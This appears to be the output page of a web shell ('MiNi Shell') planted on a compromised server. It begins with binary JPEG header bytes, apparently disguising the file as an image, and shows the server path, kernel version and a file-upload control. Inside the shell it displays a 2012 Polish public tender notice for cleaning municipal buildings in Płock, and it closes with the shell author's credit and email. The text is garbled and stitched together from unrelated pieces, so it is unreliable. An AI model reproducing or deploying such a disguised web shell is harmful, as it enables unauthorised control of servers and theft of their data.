JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121120/460060-N-2012.html

<p class="kh_header"><b>Płock: Utrzymanie porządku i czystości wewnątrz budynków gminnych, Skarbu Państwa, pomieszczeń biurowych zasobu własnego oraz na przyległych terenach przydomowych i osiedlowych (bez terenów gminnych), w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, administrowanych lub  będących własnością Miejskiego Zakładu Gospodarki Mieszkaniowej  TBS Sp. z o. o. w Płocku</b><br>
<b>Numer ogłoszenia: 460060 - 2012; data zamieszczenia: 20.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. , ul. Polna 7, 09-400 Płock, woj. mazowieckie, tel. 24 3640310, faks 24 3640311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzgm-plock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z organiczoną odpowiedzialnością ze 100% udziałem Gminy Miasto Płock.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie porządku i czystości wewnątrz budynków gminnych, Skarbu Państwa, pomieszczeń biurowych zasobu własnego oraz na przyległych terenach przydomowych i osiedlowych (bez terenów gminnych), w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, administrowanych lub  będących własnością Miejskiego Zakładu Gospodarki Mieszkaniowej  TBS Sp. z o. o. w Płocku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia:Utrzymanie porządku i czystości wewnątrz budynków gminnych, Skarbu Państwa, pomieszczeń biurowych zasobu własnego oraz na przyległych terenach przydomowych i osiedlowych (bez terenów gminnych), w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, administrowanych lub  będących własnością Miejskiego Zakładu Gospodarki Mieszkaniowej  TBS Sp. z o. o. w Płocku

Zakres  prac będących przedmiotem zamówienia rozliczanych stawką ryczałtową za 1 m2 powierzchni obejmuje w szczególności:

a. Utrzymanie porządku  i czystości wewnątrz budynku (bez budynku 3 Maja 16):

1. Codzienne sprzątanie klatek schodowych, podestów i korytarzy, zamiatanie - również pod wycieraczkami (powierzchnia ujęta w wykazach), zbieranie odpadów i miejscowe zmywanie, usuwanie pajęczyn oraz (w uzgodnieniu z ROM) nieaktualnych ogłoszeń i ulotek reklamowych.
2. Codzienne mycie pomieszczeń sanitarnych wspólnego użytku (dotyczy w szczególności budynku przy ul. Miodowej 25).
3. Mycie dwa razy w miesiącu: klatek schodowych, podestów i korytarzy, mycie gresu przed wejściem do klatek schodowych, schodów i podjazdów.
4. Mycie raz w miesiącu: drzwi wejściowych do budynku, lamperii, balustrad schodowych i grzejników na klatkach schodowych oraz tablic informacyjnych, skrzynek umieszczonych wewnątrz i na zewnątrz budynku.
5. Mycie minimum dwa razy do roku: okien, parapetów oraz kloszy na klatkach schodowych i w pomieszczeniach ogólnodostępnych, z wyłączeniem mycia okien na wysokościach. 
6. Sprzątanie raz w miesiącu: pralni, suszarni, korytarzy piwnicznych, strychów i innych pomieszczeń wspólnych.  
7. Wykładanie trutek na szczury i myszy w pomieszczeniach określonych w pkt. 6 minimum dwa razy w roku, w terminach podanych przez Rejony Obsługi Mieszkańców.
8. Oczyszczanie minimum jeden raz w miesiącu kratek przed drzwiami wejściowymi do klatek schodowych.

b.  Utrzymanie porządku i czystości  na terenach przydomowych i osiedlowych:

1. Codzienne sprzątanie chodnika wzdłuż budynku, dojść do budynku i śmietnika oraz innych powierzchni utwardzonych,
2. Systematyczne opróżnianie koszy osiedlowych.
3. Systematyczne usuwanie chwastów przy opaskach budynków i ciągach komunikacyjnych z wywiezieniem i utylizacją,
4. Minimum raz w miesiącu czyszczenie studzienek (nisz okiennych) przy okienkach piwnicznych. 
5. Systematyczne usuwanie i wywożenie zanieczyszczeń oraz zgrabianych liści z terenów zewnętrznych (również przy żywopłotach).

6. Codzienne sprzątanie placów zabaw: usuwanie śmieci, potłuczonego szkła oraz innych przedmiotów zagrażających bezpieczeństwu użytkowników,
7. Codzienne sprzątanie altany śmietnikowej lub terenu wokół pojemników na śmieci wraz z ich dezynfekcją przeprowadzaną jeden raz w tygodniu (dot. również  altany śmietnikowej przy ul. 3 Maja 16),
8. Codzienne kontrolowanie wypełnienia pojemników na nieczystości stałe oraz podejmowanie działań zmierzających do efektywnego gromadzenia tych nieczystości poprzez przegarnianie i ubijanie w pojemnikach,
9. Usuwanie śniegu z ciągów komunikacyjnych do godz. 600 rano (opad nocny) oraz w ciągu 3 godzin od ustania opadów (opad dzienny). Usuwanie śniegu należy przeprowadzić na całej szerokości ciągów komunikacyjnych. Zapobieganie skutkom gołoledzi poprzez posypywanie ciągów komunikacyjnych należących do nieruchomości, zakupionym i dowiezionym na koszt własny piaskiem, skuwanie miejsc oblodzonych oraz stałe utrzymywanie drożności odpływu z chodników wody z topniejącego śniegu i lodu,

c. Utrzymanie porządku i czystości w pomieszczeniach biurowych.

Uwaga: Usługa będzie wykonywana w dni robocze od godz. 1530
1. Czynności wykonywane codziennie:
a) zmywanie na mokro podłóg przy użyciu środków czyszczących i bieżąca konserwacja
powłok,
b) wycieranie kurzu z mebli i urządzeń biurowych (komputery wraz z klawiaturą + drukarki +
aparaty telefoniczne) oraz z parapetów,
c) usuwanie śmieci, czyszczenie koszy i wymiana worków - zakupionych i dowiezionych na koszt własny,
d) mycie luster,
e) czyszczenie pomieszczeń i armatury sanitarnej,
f) uzupełnienie środków czystości - zakupionych i dowiezionych na koszt własny -  w toaletach (papier toaletowy biały, mydło w płynie, kostki dezynfekujące do muszli),
2. Czynności wykonywane raz w miesiącu:
a) wycieranie kurzy z kontaktów prądy i wyłączników oświetlenia,
b) mycie drzwi wejściowych, drzwi wewnętrznych i futryn, 
c) odkurzanie tapicerki mebli,
d) mycie glazury i lamperii w pomieszczeniach sanitarnych i szczegółowa ich dezynfekcja,
3. Czynności wykonywane minimum dwa razy do roku:
       a)   mycie okien oraz powierzchni przeszklonych wewnątrz pomieszczeń biurowych,
       b)   mycie grzejników.

d. Współpraca z administracją (z Rejonem Obsługi Mieszkańców)

1. Niezwłoczne zawiadamianie o dostrzeżonych uszkodzeniach lub wadliwym działaniu instalacji i urządzeń technicznych oraz o przypadkach dewastacji i naruszania przez mieszkańców regulaminu porządku domowego,
2. Bieżące powiadamianie Rejonu Obsługi Mieszkańców o stwierdzonych faktach nie
wywiązywania się z obowiązków firm zajmujących się wywozem nieczystości stałych,
3. Wywieszanie flag w dniach uroczystości państwowych oraz ich zdejmowanie,
4. Niezwłoczne doręczanie korespondencji otrzymanej od Rejonu Obsługi Mieszkańców do lokali znajdujących się w budynkach wykazanych w Załącznikach wg zasady: Wykonawca dwukrotnie podejmuje próbę doręczenia korespondencji. W przypadku braku lokatora lub odmowy złożenia podpisu na wykazie doręczeń lub kopii pisma roznoszący dokonuje


 zapisu: brak lokatora, data...godz...- podpis czytelny osoby roznoszącej; lokator odmówił podpisu data...godz...- podpis czytelny osoby roznoszącej.
5. Przekazanie Zamawiającemu danych kontaktowych Wykonawcy w celu umożliwienia mieszkańcom zgłoszeń w przypadkach nie wywiązywania się z w)w zakresu.

e. Utrzymanie porządku i czystości w budynku przy ul. 3 Maja 16.

1. Codzienne sprzątanie  klatek schodowych, podestów, korytarzy, holi, portierni, wind: zamiatanie, mycie, również pod wycieraczkami, zbieranie odpadów, usuwanie pajęczyn,
2. Codzienne mycie pomieszczeń wc i urządzeń sanitarnych (dezynfekcja), tj. czterech wc na parterze, dwóch wc na III piętrze i czterech wc na IV piętrze,
3. Mycie raz w miesiącu drzwi wejściowych do budynku, na korytarzach, w piwnicy, na parterze, na IV piętrze  i do czterech wc na parterze, dwóch wc na III piętrze i czterech wc na IV piętrze, skrzynek umieszczonych wewnątrz budynku oraz lamperii, balustrad, paneli na ścianach i glazury w łazienkach,
4. Minimum dwa razy do roku mycie okien i parapetów na klatkach schodowych, korytarzach, holach oraz w czterech wc na parterze, dwóch wc na III piętrze i czterech wc na IV piętrze,
5. Minimum dwa razy do roku mycie grzejników,
6. Minimum dwa razy do roku mycie kloszy na korytarzach, holach i w czterech wc na parterze, dwóch wc na III piętrze i czterech wc na IV piętrze,
7. Minimum dwa razy w roku wykładanie trutek na szczury i myszy w pomieszczeniach technicznych (węzeł, rozdzielnia), w terminach podanych przez ROM - V,
8. Niezwłoczne zawiadomienie ROM - V o dostrzeżonych uszkodzeniach lub wadliwym działaniu instalacji i urządzeń technicznych, 
9. Wywieszanie flag w dniach uroczystości państwowych oraz ich zdejmowanie,
10. Bieżące powiadamianie ROM - V o stwierdzonych faktach nie wywiązywania się z obowiązków firmy zajmującej się wywozem nieczystości stałych,
11. Na wezwanie Zamawiającego, 0,5 h serwis w godz. 1000  - 1200  w okresie jesienno - zimowym: styczeń - marzec, październik - grudzień. 


	Integralną częścią przedmiotu zamówienia jest - Wykaz budynków i terenów , w których wykonywana będzie przedmiotowa usługa:
ROM III obejmuje:
Wykaz budynków gminnych, Wykaz budynków i terenów - zasoby własne, Skarb Państwa 
ROM IV obejmuje:
Wykaz budynków gminnych, Wykaz  budynków i terenów - zasoby własne,
ROM V obejmuje:
Wykaz budynków gminnych, Wykaz budynków i terenów - zasoby własne.
	Łączna rzeczywista powierzchnia do sprzątania w budynkach -  35 673,54 m2, łączna powierzchnia w budynkach po przeliczeniu przez współczynniki korygujące -  27 050,40 m2.
	Łączna rzeczywista powierzchnia do sprzątania terenów przyległych - 16 960,92 m2, łączna powierzchnia terenów przyległych po przeliczeniu przez współczynniki korygujące  -  8 575,72 m2.
	Łączna ilość altan śmietnikowych - 40 szt.

	Ogółem rzeczywista powierzchnia do sprzątania:   52 634,46 m2.

	Ogółem powierzchnia skorygowana o współczynniki określone w Załączniku pn. Tabela współczynników korygujących:  35 626,12 m2.



Uwaga: powierzchnia skorygowana o współczynniki określone w Załączniku nr 15 do SIWZ jest  podstawą do określenia ceny 1 m2 wskazanego w ofercie.

	Do realizacji przedmiotowej usługi w ramach poszczególnych ROM - ów, Wykonawca musi dysponować niżej wymienioną ilością osób:
				
1. ROM III	co najmniej    5 osób				
2. ROM IV	co najmniej    2 osoby		
3. ROM V	co najmniej    4 osoby

Łącznie: co najmniej  11 osób

	Zamawiający wymaga dodatkowo, by Wykonawca dysponował 1 osobą do nadzoru..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Utrzymanie porządku i czystości wewnątrz budynków gminnych, Skarbu Państwa, pomieszczeń biurowych zasobu własnego oraz na przyległych terenach przydomowych i osiedlowych (bez terenów gminnych), w zakresie wynikającym z obowiązujących przepisów, w tym prawa miejscowego, administrowanych lub  będących własnością Miejskiego Zakładu Gospodarki Mieszkaniowej  TBS Sp. z o. o. w Płocku - 20% zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.91.00-3, 90.91.92.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępując do  przetargu jest zobowiązany wnieść wadium w wysokości: 5.000,00-  zł (słownie: pięć tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia w trybie art 44 w związku z art 22 ust 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) wykonali w ciągu ostatnich trzech lat (przed upływem terminu składania ofert ), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną usługę w zakresie utrzymania porządku i czystości wewnątrz budynków i na przyległych terenach  o powierzchni po współczynnikach nie mniejszej niż 50% powierzchni do sprzątania  wskazanej w Załącznikach 6-11,16 oraz o wartości co najmniej 100.000,00 zł brutto wraz z załączonymi dokumentami potwierdzającymi, że usługa została wykonana lub jest wykonywana należycie. 
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia/nie spełnia), na podstawie oświadczeń lub dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia w trybie art 44 w związku z art 22 ust 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) dysponują co najmniej 11 osobami zdolnymi do realizacji przedmiotowej usługi:
ROM III - 5 osób, ROM IV - 2 osoby, ROM V - 4 osoby 
b) dysponują co najmniej 1 osobą do nadzoru
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia/nie spełnia), na podstawie oświadczeń lub dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opłacona polisa na kwotę nie niższą niż cena oferty, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem  zamówienia. 
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia/nie spełnia), na podstawie oświadczeń lub dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający ma prawo do zmian z powodu  nie dających się przewidzieć w dniu zawarcia umowy okoliczności - potrzeb: 
- do zmian w wykazie budynków poprzez wprowadzenie zmiany powierzchni, zmian powierzchni terenów zewnętrznych na której wykonywana będzie usługa, zmiany ilości altan śmietnikowych , w szczególności na skutek zmian w powierzchni zasobów przez niego administrowanych.
- w przypadku zmiany obowiązującej stawki VAT na przedmiot zamówienia, o którym mowa w § 1 umowy, strony dopuszczają zmianę wartości brutto stawki wg umowy o wysokość różnicy między obowiązującą stawką VAT w chwili zawarcia umowy a zmienioną stawką VAT zgodną z obowiązującymi przepisami.
 Stosowny aneks do umowy zostanie podpisany przez strony najpóźniej na 7 dni przed wejściem ich w życie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzgm-plock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zakład Gospodarki Mieszkaniowej TBS Sp. z o.o., 09-400 Płock ul. Polna 7, p.32 w godz 7.30-15.30 po wcześniejszym uiszczeniu opłaty za jej wydanie w kwocie 17,34 zł brutto.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2012 godzina 08:30, miejsce: Miejski Zakład Gospodarki Mieszkaniowej TBS Sp. z o.o., 09-400 Płock ul. Polna 7, p.1 ( Kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com